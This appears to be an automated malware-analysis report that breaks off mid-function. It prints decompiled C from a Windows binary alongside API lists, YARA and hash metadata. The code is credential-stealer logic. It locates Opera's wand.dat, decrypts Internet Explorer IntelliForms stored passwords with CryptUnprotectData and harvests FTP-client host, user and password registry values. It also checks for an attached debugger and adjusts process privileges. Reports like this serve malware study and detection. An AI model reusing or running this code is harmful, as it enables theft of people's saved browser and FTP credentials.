                                                                    				struct _WIN32_FIND_DATAA _v322;
                                                                    				void* _v328;
                                                                    				CHAR* _v332;
                                                                    				char** _v336;
                                                                    				char* _v340;
                                                                    				char* _t30;
                                                                    				void* _t36;
                                                                    				int _t39;
                                                                    				char** _t40;
                                                                    				char** _t42;
                                                                    				char* _t46;
                                                                    				void* _t52;
                                                                    				void* _t53;
                                                                    				void* _t58;
                                                                    
                                                                    				_t58 = __edi;
                                                                    				_t53 = __ecx;
                                                                    				_t52 = __ebx;
                                                                    				_v332 = 0;
                                                                    				_t30 = _a8;
                                                                    				if(_t30 == 0 ||  *_t30 == 0) {
                                                                    					L14:
                                                                    					return E004018B8(_v332);
                                                                    				} else {
                                                                    					_v332 = E00401DF8(_t30, _a8, "\*.*");
                                                                    					E004018E6( &_v322, 0x13e);
                                                                    					_t36 = FindFirstFileA(_v332,  &_v322); // executed
                                                                    					_v328 = _t36;
                                                                    					if(_t36 + 1 == 0) {
                                                                    						goto L14;
                                                                    					} else {
                                                                    						goto L4;
                                                                    					}
                                                                    					do {
                                                                    						L4:
                                                                    						if((_v322.dwFileAttributes & 0x00000010) != 0) {
                                                                    							_t40 =  &( &_v322->cFileName);
                                                                    							_push(_t40);
                                                                    							_push(0x414f84);
                                                                    							L00410712();
                                                                    							if(_t40 != 0) {
                                                                    								_t42 =  &( &_v322->cFileName);
                                                                    								_push(_t42);
                                                                    								_push(0x414f86);
                                                                    								L00410712();
                                                                    								if(_t42 != 0) {
                                                                    									_v336 =  &( &_v322->cFileName);
                                                                    									_t46 = E00401E4C(E00401DF8( &( &_v322->cFileName), _a8, "\\"), _t45, _v336);
                                                                    									_v340 = _t46;
                                                                    									_push(_t46);
                                                                    									if(StrStrIA(_v340, "opera") != 0) {
                                                                    										E00408961(_t52, _t53, _t58, _a4, _v340, "wand.dat");
                                                                    									}
                                                                    									E004018B8();
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    						_t39 = FindNextFileA(_v328,  &_v322); // executed
                                                                    					} while (_t39 != 0);
                                                                    					FindClose(_v328); // executed
                                                                    					goto L14;
                                                                    				}
                                                                    			}

                                                                    APIs
                                                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 00408B3A
                                                                    • lstrcmpi.KERNEL32(00414F84,?), ref: 00408B6D
                                                                    • lstrcmpi.KERNEL32(00414F86,?), ref: 00408B87
                                                                    • StrStrIA.SHLWAPI(?,opera,00000000,00414F86,?,00414F84,?,00000000,?), ref: 00408BCC
                                                                    • FindNextFileA.KERNEL32(?,?,00000000,?), ref: 00408BFA
                                                                    • FindClose.KERNEL32(?,?,?,00000000,?), ref: 00408C0D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
• Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Find$Filelstrcmpi$CloseFirstNext
                                                                    • String ID: \*.*$opera$wand.dat
                                                                    • API String ID: 3663067366-3278183560
                                                                    • Opcode ID: b0fc928c9cf7a6a507de29c057552652b4013fe6d0d76c55fa8916865615959a
                                                                    • Instruction ID: e5ee878ad4cec5bad4980fd33fa9531b0e4dcb501f0c88bdaa15308997453479
                                                                    • Opcode Fuzzy Hash: b0fc928c9cf7a6a507de29c057552652b4013fe6d0d76c55fa8916865615959a
                                                                    • Instruction Fuzzy Hash: 88311E7090021D9ADB60AB51CD42AE977B5AB44304F0041BBB548B91E1DB78AEC19F58
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 80%
                                                                    			E004041A6(void* __ecx, intOrPtr _a4, char* _a8, char* _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                    				struct _WIN32_FIND_DATAA _v322;
                                                                    				void* _v328;
                                                                    				CHAR* _v332;
                                                                    				char* _v336;
                                                                    				char* _t44;
                                                                    				void* _t46;
                                                                    				CHAR* _t48;
                                                                    				void* _t52;
                                                                    				char* _t55;
                                                                    				int _t57;
                                                                    				signed int* _t58;
                                                                    				char** _t60;
                                                                    				void* _t62;
                                                                    				void* _t64;
                                                                    				void* _t70;
                                                                    				void* _t74;
                                                                    				signed int* _t75;
                                                                    
                                                                    				_t74 = __ecx;
                                                                    				_v332 = 0;
                                                                    				_t44 = _a8;
                                                                    				if(_t44 == 0 ||  *_t44 == 0) {
                                                                    					L25:
                                                                    					return E004018B8(_v332);
                                                                    				} else {
                                                                    					_t46 = E004025A9(_a8);
                                                                    					_t47 = _t46;
                                                                    					if(_t46 != 0) {
                                                                    						_t48 = E00401DF8(_t47, _a8, "*.*");
                                                                    					} else {
                                                                    						_t48 = E00401DF8(_t47, _a8, "\*.*");
                                                                    					}
                                                                    					_v332 = _t48;
                                                                    					E004018E6( &_v322, 0x13e);
                                                                    					_t52 = FindFirstFileA(_v332,  &_v322); // executed
                                                                    					_v328 = _t52;
                                                                    					if(_t52 + 1 != 0) {
                                                                    						do {
                                                                    							_t75 =  &_v322;
                                                                    							if(( *_t75 & 0x00000010) == 0) {
                                                                    								_t54 =  &(_t75[0xb]);
                                                                    								_v336 =  &(_t75[0xb]);
                                                                    								if(_a12 != 0) {
                                                                    									_t55 = StrStrIA(_v336, _a12);
                                                                    									_t54 = _t55;
                                                                    									if(_t55 == 0) {
                                                                    										goto L23;
                                                                    									}
                                                                    									L19:
                                                                    									_t70 = E00401E4C(E00401DF8(_t54, _a8, "\\"), _t69, _v336);
                                                                    									_push(_t70);
                                                                    									if(_a20 == 0) {
                                                                    										E0040406C(_a4, _t70, _a16);
                                                                    									} else {
                                                                    										_a20(_a4, _t70, _a16);
                                                                    									}
                                                                    									E004018B8();
                                                                    									goto L23;
                                                                    								}
                                                                    								goto L19;
                                                                    							}
                                                                    							_t58 =  &(_t75[0xb]);
                                                                    							_push(_t58);
                                                                    							_push(0x414f84);
                                                                    							L00410712();
                                                                    							if(_t58 != 0) {
                                                                    								_t60 =  &( &_v322->cFileName);
                                                                    								_push(_t60);
                                                                    								_push(0x414f86);
                                                                    								L00410712();
                                                                    								if(_t60 != 0) {
                                                                    									_t62 = E004025A9(_a8);
                                                                    									_t63 = _t62;
                                                                    									if(_t62 != 0) {
                                                                    										_t64 = E00401DF8(_t63, _a8, 0);
                                                                    									} else {
                                                                    										_t64 = E00401DF8(_t63, _a8, "\\");
                                                                    									}
                                                                    									E004041A6(_t74, _a4, E00401E4C(_t64, _t64,  &( &_v322->cFileName)), _a12, _a16, _a20); // executed
                                                                    									E004018B8(_t65);
                                                                    								}
                                                                    							}
                                                                    							L23:
                                                                    							_t57 = FindNextFileA(_v328,  &_v322); // executed
                                                                    						} while (_t57 != 0);
                                                                    						FindClose(_v328); // executed
                                                                    					}
                                                                    					goto L25;
                                                                    				}
                                                                    			}

                                                                    APIs
                                                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 00404216
                                                                    • lstrcmpi.KERNEL32(00414F84,?), ref: 00404243
                                                                    • lstrcmpi.KERNEL32(00414F86,?), ref: 00404260
                                                                    • FindNextFileA.KERNEL32(?,?,?,00000000,00000000,?), ref: 0040432A
                                                                    • FindClose.KERNEL32(?,?,?,?,00000000,00000000,?), ref: 0040433D
                                                                      • Part of subcall function 00401DF8: lstrlen.KERNEL32(?), ref: 00401E19
                                                                      • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?), ref: 00401E23
                                                                      • Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,?), ref: 00401E37
                                                                      • Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
• Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
                                                                    • String ID: *.*$\*.*
                                                                    • API String ID: 3040542784-1692270452
                                                                    • Opcode ID: 0b6ce98c2e71a0d2229f3dd03240f69c0e8c65a849d4abd5fd50b3642ce7d593
                                                                    • Instruction ID: 5e5cf996161199591b6a28a4ff005dbab79564ec832c2e4b7604db23a3f30ec1
                                                                    • Opcode Fuzzy Hash: 0b6ce98c2e71a0d2229f3dd03240f69c0e8c65a849d4abd5fd50b3642ce7d593
                                                                    • Instruction Fuzzy Hash: B44160B0600219AADF11AF61CC06AEE3B69AF84344F1041BBBA18750F1D7789AD1AE59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 52%
                                                                    			E0040A712(void* __ecx, intOrPtr _a4, WCHAR* _a8, short* _a12) {
                                                                    				char _v24;
                                                                    				char _v44;
                                                                    				signed int _v48;
                                                                    				intOrPtr _v52;
                                                                    				char _v56;
                                                                    				intOrPtr _v60;
                                                                    				void* _v64;
                                                                    				char _v68;
                                                                    				void* _v72;
                                                                    				char _v76;
                                                                    				void* _v80;
                                                                    				char _v84;
                                                                    				signed int _t46;
                                                                    				intOrPtr _t62;
                                                                    				intOrPtr _t63;
                                                                    				void* _t76;
                                                                    				signed int _t77;
                                                                    				void* _t80;
                                                                    				void* _t81;
                                                                    
                                                                    				_t76 = __ecx;
                                                                    				_t46 = lstrlenW(_a8);
                                                                    				if(_t46 != 0) {
                                                                    					E00403510(_t76, _a8, (_t46 << 1) + 2,  &_v24);
                                                                    					_t77 = 0;
                                                                    					_v48 = 0;
                                                                    					while(_t77 < 0x14) {
                                                                    						_v48 = _v48 + ( *[ss:ecx+ebp-0x14] & 0x000000ff);
                                                                    						_t77 = _t77 + 1;
                                                                    					}
                                                                    					_t80 = 0;
                                                                    					_v52 = 0;
                                                                    					while(_t80 < 0x14) {
                                                                    						_push( *[ss:esi+ebp-0x14] & 0x000000ff);
                                                                    						wsprintfA( &_v44, "%02X");
                                                                    						_t81 = _t81 + 0xc;
                                                                    						_v52 = E00401E4C( &_v44, _v52,  &_v44);
                                                                    						_t80 = _t80 + 1;
                                                                    					}
                                                                    					_v48 = _v48 & 0x000000ff;
                                                                    					_push(_v48);
                                                                    					wsprintfA( &_v44, "%02X");
                                                                    					_v52 = E00401E4C( &_v44, _v52,  &_v44);
                                                                    					_t62 = E00401D71( *0x414869, "Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", _v52,  &_v56); // executed
                                                                    					_t63 = _t62;
                                                                    					if(_t63 != 0) {
                                                                    						_v60 = _t63;
                                                                    						if(_v56 != 0) {
                                                                    							_v84 = (lstrlenW(_a8) << 1) + 2;
                                                                    							_push(_a8);
                                                                    							_pop( *_t26);
                                                                    							_push(_v56);
                                                                    							_pop( *_t28);
                                                                    							_push(_v60);
                                                                    							_pop( *_t30);
                                                                    							_v72 = 0;
                                                                    							if( *0x414b43 != 0) {
                                                                    								_push( &_v76);
                                                                    								_push(1);
                                                                    								_push(0);
                                                                    								_push(0);
                                                                    								_push( &_v84);
                                                                    								_push(0);
                                                                    								_push( &_v68);
                                                                    								if( *0x414b43() != 0 && _v72 != 0) {
                                                                    									if(_a12 != 0) {
                                                                    										 *_a12 = 0x3f;
                                                                    									}
                                                                    									E0040A4E9(0xbeef0003, _a8, _v72, _v76, _a4);
                                                                    									LocalFree(_v72);
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    						E004018B8(_v60);
                                                                    					}
                                                                    					return E004018B8(_v52);
                                                                    				} else {
                                                                    					return _t46;
                                                                    				}
                                                                    			}

                                                                    APIs
                                                                    • lstrlenW.KERNEL32(?), ref: 0040A71C
                                                                    • wsprintfA.USER32 ref: 0040A79B
                                                                    • lstrlenW.KERNEL32(?,?), ref: 0040A7E1
                                                                    • CryptUnprotectData.CRYPT32(00000000,00000000,?,00000000,00000000,00000001,?), ref: 0040A824
                                                                    • LocalFree.KERNEL32(00000000), ref: 0040A85B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrlen$CryptDataFreeLocalUnprotectwsprintf
                                                                    • String ID: %02X$Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                                                                    • API String ID: 1926481713-2450551051
                                                                    • Opcode ID: 6647c7f13e3975a35e780e360fbebd88ab62ad7df247ec204a1b0914c87d8627
                                                                    • Instruction ID: 7cec4ba5f278735bef2daa032c3da861db9c271a8c642e1c0fec04d74f03301a
                                                                    • Opcode Fuzzy Hash: 6647c7f13e3975a35e780e360fbebd88ab62ad7df247ec204a1b0914c87d8627
                                                                    • Instruction Fuzzy Hash: 5A414D72C1021CEADF11AFA1DC01AEDBB79FF04314F14803AF911B61A1D7799A51CB59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 83%
                                                                    			E004051E3(void* __ecx, intOrPtr _a4, char* _a8, intOrPtr _a12) {
                                                                    				struct _WIN32_FIND_DATAA _v322;
                                                                    				void* _v328;
                                                                    				CHAR* _v332;
                                                                    				char** _v336;
                                                                    				char* _t31;
                                                                    				void* _t40;
                                                                    				char** _t44;
                                                                    				char** _t46;
                                                                    
                                                                    				_v332 = 0;
                                                                    				_t31 = _a8;
                                                                    				if(_t31 == 0 ||  *_t31 == 0) {
                                                                    					L12:
                                                                    					return E004018B8(_v332);
                                                                    				} else {
                                                                    					E00405182(_a4, E00401DF8(_t31, _a8, _a12)); // executed
                                                                    					_v332 = E00401DF8(E004018B8(_t33), _a8, "\*.*");
                                                                    					E004018E6( &_v322, 0x13e);
                                                                    					_t40 = FindFirstFileA(_v332,  &_v322); // executed
                                                                    					_v328 = _t40;
                                                                    					if(_t40 + 1 == 0) {
                                                                    						goto L12;
                                                                    					} else {
                                                                    						goto L4;
                                                                    					}
                                                                    					do {
                                                                    						L4:
                                                                    						if((_v322.dwFileAttributes & 0x00000010) != 0) {
                                                                    							_t44 =  &( &_v322->cFileName);
                                                                    							_push(_t44);
                                                                    							_push(0x414f84);
                                                                    							L00410712();
                                                                    							if(_t44 != 0) {
                                                                    								_t46 =  &( &_v322->cFileName);
                                                                    								_push(_t46);
                                                                    								_push(0x414f86);
                                                                    								L00410712();
                                                                    								if(_t46 != 0) {
                                                                    									_v336 =  &( &_v322->cFileName);
                                                                    									E00405182(_a4, E00401E4C(E00401E4C(E00401DF8( &( &_v322->cFileName), _a8, "\\"), _t49, _v336), _t50, _a12));
                                                                    									E004018B8(_t51);
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    					} while (FindNextFileA(_v328,  &_v322) != 0);
                                                                    					FindClose(_v328);
                                                                    					goto L12;
                                                                    				}
                                                                    			}

                                                                    APIs
                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000), ref: 00405252
                                                                    • lstrcmpi.KERNEL32(00414F84,?), ref: 00405281
                                                                    • lstrcmpi.KERNEL32(00414F86,?), ref: 0040529B
                                                                    • FindNextFileA.KERNEL32(?,?,00000000,?,00000000), ref: 004052F3
                                                                    • FindClose.KERNEL32(?,?,?,00000000,?,00000000), ref: 00405306
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Find$Filelstrcmpi$CloseFirstNext
                                                                    • String ID: \*.*
                                                                    • API String ID: 3663067366-1173974218
                                                                    • Opcode ID: abce2907b9ceeec2b444caf12c87fa27808904b757d057f167757f19a0a6580e
                                                                    • Instruction ID: 4170e0cdbb32cde0fb555d52f6b502d03a9112cbff49fd029bea05776b430742
                                                                    • Opcode Fuzzy Hash: abce2907b9ceeec2b444caf12c87fa27808904b757d057f167757f19a0a6580e
                                                                    • Instruction Fuzzy Hash: 18312D7190021AAADF21AB61CC42AEE77A9EF00314F0045BAF818B51E2D7789BD19F59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 87%
                                                                    			E00402968(CHAR* _a4, intOrPtr _a8) {
                                                                    				struct _LUID _v12;
                                                                    				void* _v16;
                                                                    				int _v20;
                                                                    				void* _v24;
                                                                    				void* _v28;
                                                                    				struct _TOKEN_PRIVILEGES _v32;
                                                                    				int _t19;
                                                                    				int _t28;
                                                                    				void* _t30;
                                                                    
                                                                    				if( *0x414b3b == 0 ||  *0x414b3f == 0 ||  *0x414b27 == 0) {
                                                                    					return 0;
                                                                    				} else {
                                                                    					_t30 = 0;
                                                                    					_v16 = 0;
                                                                    					_t19 = LookupPrivilegeValueA(0, _a4,  &_v12); // executed
                                                                    					if(_t19 != 0) {
                                                                    						if(OpenProcessToken(GetCurrentProcess(), 0x20,  &_v16) != 0) {
                                                                    							_v32.PrivilegeCount = 1;
                                                                    							 *_t7 = _v12.LowPart;
                                                                    							_push(_v12.HighPart);
                                                                    							_pop( *_t9);
                                                                    							if(_a8 == 0) {
                                                                    								_v20 = 0;
                                                                    							} else {
                                                                    								_v20 = 2;
                                                                    							}
                                                                    						}
                                                                    						_t28 = AdjustTokenPrivileges(_v16, 0,  &_v32, 0x10, 0, 0); // executed
                                                                    						if(_t28 != 0) {
                                                                    							_t30 = _t30 + 1;
                                                                    						}
                                                                    					}
                                                                    					if(_v16 != 0) {
                                                                    						CloseHandle(_v16); // executed
                                                                    					}
                                                                    					return _t30;
                                                                    				}
                                                                    			}

                                                                    APIs
                                                                    • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 004029A3
                                                                    • GetCurrentProcess.KERNEL32 ref: 004029AD
                                                                    • OpenProcessToken.ADVAPI32(00000000,00000020,00000000), ref: 004029BB
                                                                    • AdjustTokenPrivileges.KERNELBASE(00000000,00000000,?,00000010,00000000,00000000), ref: 004029FD
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00402A11
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
                                                                    • String ID:
                                                                    • API String ID: 3038321057-0
                                                                    • Opcode ID: fc9f9e775449fdf1cf86c9df712af2ede95f219a55d47c9d5b092a3d41e4426a
                                                                    • Instruction ID: e5dea28dedcf19f79be4c8bfd698f998e52e89be124952076ce29543bc0c9a4f
                                                                    • Opcode Fuzzy Hash: fc9f9e775449fdf1cf86c9df712af2ede95f219a55d47c9d5b092a3d41e4426a
                                                                    • Instruction Fuzzy Hash: 1A111CB1A04209EFEF218F95DD49BEEB7B4BB40319F148136A151B41D0D7F89684CF19
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0041051E(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
                                                                    				int* _t5;
                                                                    				int* _t6;
                                                                    				int _t10;
                                                                    				void* _t18;
                                                                    				void* _t19;
                                                                    				void* _t21;
                                                                    
                                                                    				_t24 = __eflags;
                                                                    				_t19 = __ecx;
                                                                    				_t18 = __ebx;
                                                                    				L004107A8(); // executed
                                                                    				_t5 = E00402BCA(E0040FA90(E00402530(), __eflags), __eflags); // executed
                                                                    				_t6 = E00402C01(_t5, _t24); // executed
                                                                    				_t7 = _t6;
                                                                    				_t25 = _t6;
                                                                    				if(_t6 != 0 && E00402CE7(_t7, _t25) != 0) {
                                                                    					 *0x414d24 = 1;
                                                                    				}
                                                                    				 *0x4173a9 = E004018CF(0x101);
                                                                    				 *(_t21 - 4) = 0x101;
                                                                    				_t10 = GetUserNameA( *0x4173a9, _t21 - 4); // executed
                                                                    				_t27 = _t10;
                                                                    				if(_t10 == 0) {
                                                                    					E004018B8( *0x4173a9);
                                                                    					 *0x4173a9 = 0; // executed
                                                                    				}
                                                                    				E004020B9(_t18, _t19); // executed
                                                                    				return E0040FAEC(E00401D9D(), _t18, _t27, "1357");
                                                                    			}

                                                                    APIs
                                                                    • OleInitialize.OLE32 ref: 0041051E
                                                                    • GetUserNameA.ADVAPI32(?,00000101), ref: 0041056E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: InitializeNameUser
                                                                    • String ID: 1357
                                                                    • API String ID: 2272643758-1433566376
                                                                    • Opcode ID: 9009a882bf03559a6605a0ee64cd6e5834a37b28e6fa8cbe3f6c415c999155d7
                                                                    • Instruction ID: f8a90d01b74eef74cfed5de9fe492a059dec9afd9cac863eb884a77ae8a26fbd
                                                                    • Opcode Fuzzy Hash: 9009a882bf03559a6605a0ee64cd6e5834a37b28e6fa8cbe3f6c415c999155d7
                                                                    • Instruction Fuzzy Hash: 1FF0FE74654209ADDB20BBB2DD076DD3AA65B0030CF14443BB918F11E2DAFD45C4EA2D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 94%
                                                                    			E004105D6(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags) {
                                                                    				_Unknown_base(*)()* _t1;
                                                                    				void* _t2;
                                                                    				void* _t3;
                                                                    				void* _t4;
                                                                    				int _t5;
                                                                    				char* _t6;
                                                                    				void* _t7;
                                                                    				void* _t8;
                                                                    				void* _t10;
                                                                    				void* _t13;
                                                                    
                                                                    				_t13 = __eflags;
                                                                    				_t10 = __ecx;
                                                                    				_t9 = __ebx;
                                                                    				_t1 = SetUnhandledExceptionFilter(??); // executed; installs a top-level handler, argument not recovered by the decompiler
                                                                    				_t2 = E00410508(_t1, _t13); // executed
                                                                    				_t3 = E0040FA90(_t2, _t13); // executed
                                                                    				_t4 = E0040FD60(_t3, __ebx, __edi, _t13); // executed
                                                                    				_t5 = E0040FE6F(_t4, __ebx, _t10, _t13); // executed
                                                                    				if( *0x414d24 != 0) {
                                                                    					_t15 =  *0x414b23;
                                                                    					if( *0x414b23 != 0) {
                                                                    						_t5 = RevertToSelf(); // drops any impersonation token on the calling thread
                                                                    					}
                                                                    					 *0x414869 = 0x80000001; // executed; HKEY_CURRENT_USER, later passed as the root HKEY to RegOpenKeyA in E004059A4
                                                                    				}
                                                                    				_t6 = E00410223(_t5, _t15); // executed
                                                                    				_t7 = E0041032D(_t6, _t10, _t15); // executed
                                                                    				_t8 = E00410065(_t7, _t9, _t15); // executed
                                                                    				return _t8;
                                                                    			}

                                                                    APIs
                                                                    • SetUnhandledExceptionFilter.KERNEL32 ref: 004105D6
                                                                    • RevertToSelf.ADVAPI32 ref: 00410601
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExceptionFilterRevertSelfUnhandled
                                                                    • String ID:
                                                                    • API String ID: 669012916-0
                                                                    • Opcode ID: cb76501a8b5efdf40eeb47ef9fa0f3767e36d88dbf6e333e52206afbcd3a8f02
                                                                    • Instruction ID: 497a937cfd444ccb75a01f451d1fff2a03657cb5d6782b497a70bab0a2736278
                                                                    • Opcode Fuzzy Hash: cb76501a8b5efdf40eeb47ef9fa0f3767e36d88dbf6e333e52206afbcd3a8f02
                                                                    • Instruction Fuzzy Hash: 92D067744451498AD6757BF6A80A7DC3651ABC430EF40843FA401109A7CEFD24D8CD2F
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 51%
                                                                    			E0040F984(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __eflags) {
                                                                    				intOrPtr _v8;
                                                                    				char _v15;
                                                                    				intOrPtr _v20;
                                                                    				intOrPtr _t12;
                                                                    				intOrPtr* _t19;
                                                                    				char* _t25;
                                                                    				void* _t27;
                                                                    				intOrPtr _t28;
                                                                    
                                                                    				_t8 = __eax;
                                                                    				_t28 = _t27 + 0xfffffffc;
                                                                    				_push(_t27);
                                                                    				_push(0x40f999);
                                                                    				asm("clc");
                                                                    				if(__eflags < 0) {
                                                                    					_t25 =  &_v15;
                                                                    					asm("cld");
                                                                    					 *__eax =  *__eax + __eax; // add [eax],eax: the clc/add sequence above is typical of data bytes decoded as code (hence the 51% quality); the recoverable body starts below
                                                                    					 *_t8 =  *__eax + __eax;
                                                                    					_t19 = 0x417215; // NULL-terminated table of function pointers; the loop below calls each entry in turn
                                                                    					_push(_v8);
                                                                    					_pop( *0x4173a1);
                                                                    					_t9 =  *[fs:0x30]; // x86 TEB+0x30 = PEB
                                                                    					__eflags =  *((char*)( *[fs:0x30] + 2)); // PEB+2 = BeingDebugged
                                                                    					if(__eflags != 0) {
                                                                    						_t9 = E00401021(_t9, __ebx, __ecx, __edx, __eflags, _v8); // only reached when a debugger is attached
                                                                    					}
                                                                    					while(1) {
                                                                    						__eflags =  *_t19;
                                                                    						if( *_t19 == 0) {
                                                                    							break;
                                                                    						}
                                                                    						E0040240A(_t9);
                                                                    						 *0x41739d = E00401522(_v8);
                                                                    						_t12 = _t28;
                                                                    						 *[fs:0x0] = _t28; // push an SEH frame so a fault inside one table entry does not end the loop
                                                                    						_t9 =  *_t19(_v8, _t12, E0040FA2E, 0x40fa75, _t12, _t25,  *[fs:0x0],  *[fs:0x0]); // executed; call the current table entry
                                                                    						__eflags =  *_t19 - E004045FD;
                                                                    						if( *_t19 != E004045FD) {
                                                                    							__eflags = _t9 - 0x10;
                                                                    							if(__eflags == 0) {
                                                                    								_t9 = E004012DC(_t9, __eflags,  *0x4173a1,  *0x41739d);
                                                                    							} else {
                                                                    								_v20 = 1;
                                                                    							}
                                                                    						}
                                                                    						_t28 = _t28 + 0x18;
                                                                    						_pop( *[fs:0x0]); // pop the SEH frame again before the next entry
                                                                    						_t19 = _t19 + 4;
                                                                    						__eflags = _t19;
                                                                    					}
                                                                    					return _v20;
                                                                    				} else {
                                                                    					return __eax;
                                                                    				}
                                                                    			}

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ed01d4cfb2e29545d8253cef9413e7fffcbc110b30fb49b671bf2a8bedab1260
                                                                    • Instruction ID: d83f140231b2433478d0a28666096bc940b33525d9759782800d4ca776c3ccd3
                                                                    • Opcode Fuzzy Hash: ed01d4cfb2e29545d8253cef9413e7fffcbc110b30fb49b671bf2a8bedab1260
                                                                    • Instruction Fuzzy Hash: EB110471608244FFDB214B59CC06F953F74E701B50F144037F80A629E2C33D4995EA4A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E004059A4(intOrPtr _a4, char* _a8) {
                                                                    				void* _v8;
                                                                    				int _v12;
                                                                    				int _v16;
                                                                    				char _v2064;
                                                                    				intOrPtr _v2068;
                                                                    				long _t29;
                                                                    				long _t32;
                                                                    
                                                                    				// three alternative value-name layouts (password, host, user, port, remote path, server type) are tried on the key named by _a8
                                                                    				E00405844(_a4, _a8, "Pass", "Host", "User", "Port", "Remote Dir", "Server Type", 0xbeef0013); // executed
                                                                    				E00405844(_a4, _a8, "Server.Pass", "Server.Host", "Server.User", "Server.Port", "Path", "ServerType", 0xbeef0013);
                                                                    				E00405844(_a4, _a8, "Last Server Pass", "Last Server Host", "Last Server User", "Last Server Port", "Last Server Path", "Last Server Type", 0xbeef0014);
                                                                    				_t29 = RegOpenKeyA( *0x414869, _a8,  &_v8); // root HKEY stored at 0x414869 (HKEY_CURRENT_USER when set by E004105D6)
                                                                    				if(_t29 == 0) {
                                                                    					_v12 = 0;
                                                                    					while(1) {
